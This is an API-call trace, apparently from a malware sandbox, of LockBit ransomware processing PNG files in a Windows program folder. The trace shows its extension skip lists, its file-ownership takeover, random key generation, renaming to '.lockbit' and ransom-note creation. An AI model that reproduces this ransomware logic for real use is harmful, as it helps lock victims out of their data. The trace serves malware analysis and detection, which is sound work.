[0087.419] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0087.419] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0087.419] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0087.419] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0087.419] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0087.419] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.419] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0087.419] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0087.419] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0087.420] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0087.420] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0087.420] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0087.420] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0087.420] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0087.420] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0087.420] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0087.420] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0087.420] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0087.420] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0087.420] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0087.420] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0087.420] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0087.420] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0087.420] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.420] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0087.420] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0087.420] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0087.421] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0087.421] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="203x8subpicture.png") returned 1 [0087.421] lstrcmpiW (lpString1="ntldr", lpString2="203x8subpicture.png") returned 1 [0087.421] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="203x8subpicture.png") returned 1 [0087.421] lstrcmpiW (lpString1="bootsect.bak", lpString2="203x8subpicture.png") returned 1 [0087.421] lstrcmpiW (lpString1="autorun.inf", lpString2="203x8subpicture.png") returned 1 [0087.421] lstrcmpiW (lpString1="thumbs.db", lpString2="203x8subpicture.png") returned 1 [0087.421] lstrcmpiW (lpString1="iconcache.db", lpString2="203x8subpicture.png") returned 1 [0087.421] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\") returned="" [0087.421] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\203x8subpicture.png") returned=".png" [0087.421] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0087.421] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0087.421] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0087.421] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0087.421] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0087.421] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0087.421] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0087.422] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0087.422] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0087.422] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0087.422] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0087.422] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0087.422] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0087.422] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0087.422] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0087.422] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0087.422] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0087.422] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0087.422] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0087.422] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0087.422] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0087.422] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0087.422] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0087.422] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0087.422] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0087.423] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0087.423] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0087.423] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0087.423] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\203x8subpicture.png.lockbit") returned 80 [0087.423] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\203x8subpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.423] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.424] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.424] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.424] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.424] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.424] RtlFreeAnsiString (AnsiString="\\") [0087.424] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c8) returned 0x0 [0087.425] malloc (_Size=0x200) returned 0x77d800 [0087.425] NtQueryInformationToken (in: TokenHandle=0x3c8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0087.425] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.425] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.425] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\203x8subpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.425] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\203x8subpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.426] CloseHandle (hObject=0x3c8) returned 1 [0087.426] free (_Block=0x77d800) [0087.426] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\203x8subpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c8 [0087.426] CreateIoCompletionPort (FileHandle=0x3c8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.426] malloc (_Size=0x40068) returned 0x3e700e8 [0087.427] GetFileSizeEx (in: hFile=0x3c8, lpFileSize=0x3e70100 | out: lpFileSize=0x3e70100*=2820) returned 1 [0087.427] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.428] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb011c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb011c) returned 0x0 [0087.428] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.481] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.482] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb012c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb012c) returned 0x0 [0087.482] ReadFile (in: hFile=0x3c8, lpBuffer=0x3e7011c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e700e8 | out: lpBuffer=0x3e7011c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e700e8) returned 1 [0087.483] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\203x8subpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\203x8subpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.483] malloc (_Size=0xb6) returned 0x1ff1e60 [0087.484] NtSetInformationFile (FileHandle=0x3c8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xb6, FileInformationClass=0xa) returned 0x0 [0087.484] free (_Block=0x1ff1e60) [0087.484] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\203x8subpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter") returned 1 [0087.484] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\Restore-My-Files.txt") returned 73 [0087.484] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.484] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70007aa2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70007aa2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f92909f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0087.485] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0087.485] lstrcmpiW (lpString1="..", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0087.485] PathFindExtensionW (pszPath="NavigationLeft_ButtonGraphic.png") returned=".png" [0087.485] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0087.485] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0087.485] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0087.485] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0087.485] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0087.485] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0087.485] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0087.485] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0087.485] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0087.485] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0087.485] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0087.485] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0087.485] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0087.485] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0087.485] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0087.485] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0087.485] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0087.485] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0087.485] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0087.486] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0087.486] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0087.486] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0087.486] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0087.486] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0087.486] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.486] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0087.486] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0087.486] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0087.486] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0087.486] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0087.486] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0087.486] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0087.486] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0087.486] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0087.486] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0087.486] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0087.486] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0087.486] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0087.486] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0087.486] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0087.486] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0087.486] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0087.486] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.487] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0087.487] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0087.487] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0087.487] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0087.487] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0087.487] lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0087.487] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0087.487] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0087.487] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0087.487] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0087.487] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0087.487] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\") returned="" [0087.487] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_ButtonGraphic.png") returned=".png" [0087.487] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0087.487] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0087.487] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0087.487] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0087.487] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0087.487] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0087.487] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0087.487] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0087.487] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0087.487] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0087.487] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0087.488] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0087.488] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0087.488] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0087.488] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0087.488] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0087.488] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0087.488] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0087.488] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0087.488] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0087.488] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0087.488] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0087.488] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0087.488] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0087.488] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0087.488] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0087.488] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0087.488] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0087.488] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_ButtonGraphic.png.lockbit") returned 93 [0087.488] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.489] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.489] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.489] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.490] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.490] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.490] RtlFreeAnsiString (AnsiString="\\") [0087.490] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0087.490] malloc (_Size=0x200) returned 0x77d800 [0087.490] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0087.491] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.491] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.491] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.492] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.492] CloseHandle (hObject=0x3a0) returned 1 [0087.492] free (_Block=0x77d800) [0087.492] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0087.493] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.493] malloc (_Size=0x40068) returned 0x3e30078 [0087.493] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x3e30090 | out: lpFileSize=0x3e30090*=5088) returned 1 [0087.493] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.493] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.493] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e700ac, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e700ac) returned 0x0 [0087.493] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.494] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e700bc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e700bc) returned 0x0 [0087.494] ReadFile (in: hFile=0x3a0, lpBuffer=0x3e300ac, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078) returned 0x0 [0087.506] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.506] malloc (_Size=0xd0) returned 0x1ff1e60 [0087.506] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xd0, FileInformationClass=0xa) returned 0x0 [0087.506] free (_Block=0x1ff1e60) [0087.506] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter") returned 1 [0087.506] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\Restore-My-Files.txt") returned 73 [0087.507] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.507] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ffe1945, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ffe1945, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fa59b8f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0087.507] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0087.507] lstrcmpiW (lpString1="..", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0087.507] PathFindExtensionW (pszPath="NavigationLeft_SelectionSubpicture.png") returned=".png" [0087.507] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0087.507] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0087.507] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0087.507] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0087.507] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0087.507] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0087.507] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0087.507] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0087.507] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0087.507] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0087.507] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0087.507] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0087.507] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0087.508] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0087.508] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0087.508] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0087.508] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0087.508] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0087.508] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0087.508] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0087.508] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0087.508] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0087.508] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0087.508] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0087.508] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.508] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0087.508] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0087.508] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0087.508] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0087.508] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0087.508] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0087.508] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0087.508] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0087.508] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0087.508] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0087.508] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0087.508] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0087.508] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0087.508] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0087.509] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0087.509] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0087.509] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0087.509] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 